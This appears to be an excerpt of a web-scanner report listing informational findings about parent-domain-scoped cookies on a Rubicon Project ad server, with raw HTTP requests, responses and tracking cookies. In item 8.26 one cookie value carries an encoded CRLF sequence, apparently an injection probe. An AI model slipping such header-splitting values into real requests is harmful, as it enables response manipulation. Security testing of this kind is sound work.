GET /a/7725/12338/22678-2.js?cb=89263094&keyword=ndm|business.businessold HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/business/business-old/fraud-blackmail-in-latest-oswal-claims/story-e6frg2qu-1226131700884
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2081=OO-00000000000000000; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_2100=usr3fe3ac8db403a568; au=GSAE3LG5-KKTN-10.208.77.156; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1%267727%3D1%265852%3D1; put_2101=f31d0c43-cd91-4caf-ae01-86754c3f8535; cd=false; lm="7 Sep 2011 14:14:54 GMT"; csi15=3188306.js^1^1315404900^1315404900&3151650.js^1^1315404889^1315404889&3196947.js^1^1315404889^1315404889&3186719.js^1^1315404875^1315404875&3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; csi2=3151648.js^2^1315404875^1315404931&3196945.js^2^1315404874^1315404931&3165011.js^2^1315404895^1315404918&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; ses15=12338^10&12590^8; rdk=7725/12338; rdk2=0; ses2=12338^15&12590^6

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:21:37 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7725/12338; expires=Wed, 07-Sep-2011 15:21:37 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=04e8588ddb08ddb10f49af8be; expires=Wed, 07-Sep-2011 15:21:37 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=12338^40&12590^82; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=63502; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 2165

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3146392"
...[SNIP]...

8.25. http://optimized-by.rubiconproject.com/a/7725/12338/22682-15.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/7725/12338/22682-15.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rdk=7725/12338; expires=Wed, 07-Sep-2011 15:14:48 GMT; max-age=60; path=/; domain=.rubiconproject.com
rdk15=04e8588dd8e11c55ed6b14ad2; expires=Wed, 07-Sep-2011 15:14:48 GMT; max-age=10; path=/; domain=.rubiconproject.com
ses15=12338^113&12590^132; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=63911; path=/; domain=.rubiconproject.com
csi15=3188306.js^1^1315404888^1315404888&3151966.js^3^1315404887^1315404888&3152309.js^12^1315404884^1315404887&3220315.js^1^1315404885^1315404885&3165015.js^3^1315404883^1315404884&3178849.js^1^1315404882^1315404882&3151650.js^2^1315404881^1315404882&3196947.js^2^1315404881^1315404881&3226141.js^1^1315404881^1315404881&3186719.js^1^1315404875^1315404875&3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; expires=Wed, 14-Sep-2011 14:14:48 GMT; max-age=604800; path=/; domain=.rubiconproject.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/7725/12338/22682-15.js?cb=99484313&keyword=ndm|news.weather HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://weather.news.com.au/wa/perth/perth
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2081=OO-00000000000000000; csi15=3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; ses15=12338^2&12590^2; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1; put_2100=usr3fe3ac8db403a568; rdk=7856/12590; rdk2=0; ses2=12338^3&12590^1; csi2=3196945.js^1^1315404874^1315404874&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; cd=false; au=GSAE3LG5-KKTN-10.208.77.156; lm="7 Sep 2011 14:14:35 GMT"

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:14:48 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7725/12338; expires=Wed, 07-Sep-2011 15:14:48 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=04e8588dd8e11c55ed6b14ad2; expires=Wed, 07-Sep-2011 15:14:48 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=12338^113&12590^132; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=63911; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=3188306.js^1^1315404888^1315404888&3151966.js^3^1315404887^1315404888&3152309.js^12^1315404884^1315404887&3220315.js^1^1315404885^1315404885&3165015.js^3^1315404883^1315404884&3178849.js^1^1315404882^1315404882&3151650.js^2^1315404881^1315404882&3196947.js^2^1315404881^1315404881&3226141.js^1^1315404881^1315404881&3186719.js^1^1315404875^1315404875&3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; expires=Wed, 14-Sep-2011 14:14:48 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 2134

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3188306"
...[SNIP]...

8.26. http://optimized-by.rubiconproject.com/a/7725/12338/22682-2.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/7725/12338/22682-2.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rdk=7725/12338; expires=Wed, 07-Sep-2011 15:20:05 GMT; max-age=60; path=/; domain=.rubiconproject.com
rdk2=1c0952%250d%250adc97b2d5930; expires=Wed, 07-Sep-2011 15:20:05 GMT; max-age=10; path=/; domain=.rubiconproject.com
ses2=12338^11&12590^454806; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=63594; path=/; domain=.rubiconproject.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/7725/12338/22682-2.js?cb=56339010&keyword=ndm|news.local HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.ntnews.com.au/article/2011/09/07/258681_ntnews.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2081=OO-00000000000000000; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_2100=usr3fe3ac8db403a568; au=GSAE3LG5-KKTN-10.208.77.156; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1%267727%3D1%265852%3D1; put_2101=f31d0c43-cd91-4caf-ae01-86754c3f8535; cd=false; lm="7 Sep 2011 14:14:54 GMT"; csi15=3188306.js^1^1315404900^1315404900&3151650.js^1^1315404889^1315404889&3196947.js^1^1315404889^1315404889&3186719.js^1^1315404875^1315404875&3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; csi2=3151648.js^2^1315404875^1315404931&3196945.js^2^1315404874^1315404931&3165011.js^2^1315404895^1315404918&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; ses2=12338^10&12590^6; rdk=7856/12590; ses15=12338^7&12590^7

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:20:05 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7725/12338; expires=Wed, 07-Sep-2011 15:20:05 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=1c0952%250d%250adc97b2d5930; expires=Wed, 07-Sep-2011 15:20:05 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=12338^11&12590^454806; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=63594; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 3195

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3182363"
...[SNIP]...

8.27. http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/7856/12590/22782-15.html

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rdk=7856/12590; expires=Wed, 07-Sep-2011 15:19:55 GMT; max-age=60; path=/; domain=.rubiconproject.com
rdk15=04e8588dd97f74c7a98e39cf2; expires=Wed, 07-Sep-2011 15:19:55 GMT; max-age=10; path=/; domain=.rubiconproject.com
ses15=4e8588ddc30f9fd9f878d610^&12590^65&12338^53; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=63604; path=/; domain=.rubiconproject.com
csi15=3165015.js^2^1315405194^1315405195&3151969.js^11^1315405176^1315405190&3150144.js^1^1315405186^1315405186&3178849.js^1^1315405181^1315405181&3151650.js^2^1315405172^1315405175&3196947.js^2^1315405168^1315405171&3188306.js^1^1315405169^1315405169&3186719.js^1^1315405168^1315405168&3212309.js^1^1315405167^1315405167&3199969.js^1^1315405166^1315405166; expires=Wed, 14-Sep-2011 14:19:55 GMT; max-age=604800; path=/; domain=.rubiconproject.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/7856/12590/22782-15.html?cb=0.39881858555600047&keyword=smh/business_other HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.smh.com.au/business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2081=OO-00000000000000000; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_2100=usr3fe3ac8db403a568; au=GSAE3LG5-KKTN-10.208.77.156; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1%267727%3D1%265852%3D1; put_2101=f31d0c43-cd91-4caf-ae01-86754c3f8535; cd=false; lm="7 Sep 2011 14:14:54 GMT"; csi15=3188306.js^1^1315404900^1315404900&3151650.js^1^1315404889^1315404889&3196947.js^1^1315404889^1315404889&3186719.js^1^1315404875^1315404875&3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; csi2=3151648.js^2^1315404875^1315404931&3196945.js^2^1315404874^1315404931&3165011.js^2^1315404895^1315404918&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; ses15=12338^7&12590^5; rdk=7856/12590; rdk2=0; ses2=12338^10&12590^5

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:19:55 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7856/12590; expires=Wed, 07-Sep-2011 15:19:55 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=04e8588dd97f74c7a98e39cf2; expires=Wed, 07-Sep-2011 15:19:55 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=4e8588ddc30f9fd9f878d610^&12590^65&12338^53; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=63604; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=3165015.js^2^1315405194^1315405195&3151969.js^11^1315405176^1315405190&3150144.js^1^1315405186^1315405186&3178849.js^1^1315405181^1315405181&3151650.js^2^1315405172^1315405175&3196947.js^2^1315405168^1315405171&3188306.js^1^1315405169^1315405169&3186719.js^1^1315405168^1315405168&3212309.js^1^1315405167^1315405167&3199969.js^1^1315405166^1315405166; expires=Wed, 14-Sep-2011 14:19:55 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Content-Length: 1654

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<style type="text/css"> body {margin:0px; padding:0px;} </style>
<script type="tex
...[SNIP]...

8.28. http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/7856/12590/22782-15.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rdk=7856/12590; expires=Wed, 07-Sep-2011 15:30:03 GMT; max-age=60; path=/; domain=.rubiconproject.com
rdk15=04e8588ddd34dd9206cdecba9; expires=Wed, 07-Sep-2011 15:30:03 GMT; max-age=10; path=/; domain=.rubiconproject.com
ses15=12338^76&12590^78; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=62996; path=/; domain=.rubiconproject.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/7856/12590/22782-15.js?cb=0.520786275388673&keyword=wa/news_home HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.watoday.com.au/wa-news/thousands-of-wa-households-went-cold-and-hungry-abs-20110906-1jvz4.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2081=OO-00000000000000000; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_2100=usr3fe3ac8db403a568; au=GSAE3LG5-KKTN-10.208.77.156; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1%267727%3D1%265852%3D1; put_2101=f31d0c43-cd91-4caf-ae01-86754c3f8535; cd=false; lm="7 Sep 2011 14:14:54 GMT"; csi15=3188306.js^1^1315404900^1315404900&3151650.js^1^1315404889^1315404889&3196947.js^1^1315404889^1315404889&3186719.js^1^1315404875^1315404875&3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; csi2=3165011.js^3^1315404895^1315405144&3151648.js^2^1315404875^1315404931&3196945.js^2^1315404874^1315404931&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; ses15=12338^11&12590^8; rdk=7725/12338; rdk2=0; ses2=12338^18&12590^6

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:30:03 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7856/12590; expires=Wed, 07-Sep-2011 15:30:03 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=04e8588ddd34dd9206cdecba9; expires=Wed, 07-Sep-2011 15:30:03 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=12338^76&12590^78; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=62996; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 2908

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3182366"
...[SNIP]...

8.29. http://optimized-by.rubiconproject.com/a/7856/12590/22782-2.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/7856/12590/22782-2.html

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rdk=7856/12590; expires=Wed, 07-Sep-2011 15:31:51 GMT; max-age=60; path=/; domain=.rubiconproject.com
rdk2=04e8588ddb95b3c4623aa79e6; expires=Wed, 07-Sep-2011 15:31:51 GMT; max-age=10; path=/; domain=.rubiconproject.com
ses2=4e8588dd3e9c0c4d453ad2c4^&12338^15&12590^1; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=62888; path=/; domain=.rubiconproject.com
csi2=3151964.js^2^1315405891^1315405911&3152310.js^3^1315405830^1315405906&3151648.js^2^1315405815^1315405861&3196945.js^2^1315405767^1315405804&3165011.js^3^1315405775^1315405790&3199967.js^1^1315405763^1315405763; expires=Wed, 14-Sep-2011 14:31:51 GMT; max-age=604800; path=/; domain=.rubiconproject.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/7856/12590/22782-2.html?cb=0.3859964762814343&keyword=smh/business_home HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.smh.com.au/business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2081=OO-00000000000000000; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_2100=usr3fe3ac8db403a568; au=GSAE3LG5-KKTN-10.208.77.156; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1%267727%3D1%265852%3D1; put_2101=f31d0c43-cd91-4caf-ae01-86754c3f8535; cd=false; lm="7 Sep 2011 14:14:54 GMT"; csi15=3188306.js^1^1315404900^1315404900&3151650.js^1^1315404889^1315404889&3196947.js^1^1315404889^1315404889&3186719.js^1^1315404875^1315404875&3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; ses15=12338^11&12590^9; rdk=7725/12338; rdk2=0; ses2=12338^19&12590^7; csi2=3152310.js^1^1315405364^1315405364&3165011.js^3^1315404895^1315405144&3151648.js^2^1315404875^1315404931&3196945.js^2^1315404874^1315404931&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:31:51 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7856/12590; expires=Wed, 07-Sep-2011 15:31:51 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=04e8588ddb95b3c4623aa79e6; expires=Wed, 07-Sep-2011 15:31:51 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=4e8588dd3e9c0c4d453ad2c4^&12338^15&12590^1; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=62888; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=3151964.js^2^1315405891^1315405911&3152310.js^3^1315405830^1315405906&3151648.js^2^1315405815^1315405861&3196945.js^2^1315405767^1315405804&3165011.js^3^1315405775^1315405790&3199967.js^1^1315405763^1315405763; expires=Wed, 14-Sep-2011 14:31:51 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Content-Length: 2269

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<style type="text/css"> body {margin:0px; padding:0px;} </style>
<script type="tex
...[SNIP]...

8.30. http://optimized-by.rubiconproject.com/a/7856/12590/22893-15.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/7856/12590/22893-15.html

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rdk=7856/12590; expires=Wed, 07-Sep-2011 15:15:31 GMT; max-age=60; path=/; domain=.rubiconproject.com
ses15=12338^5&12590^6; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=63868; path=/; domain=.rubiconproject.com
csi15=3196947.js^2^1315404889^1315404931&3188306.js^1^1315404900^1315404900&3151650.js^1^1315404889^1315404889&3186719.js^1^1315404875^1315404875&3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; expires=Wed, 14-Sep-2011 14:15:31 GMT; max-age=604800; path=/; domain=.rubiconproject.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/7856/12590/22893-15.html?cb=0.33166992268525064&keyword=smh/news_other&rf=http%3A//news.smh.com.au/breaking-news-national/wa-labor-launches-another-bushfire-probe-20110907-1jx2h.html HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
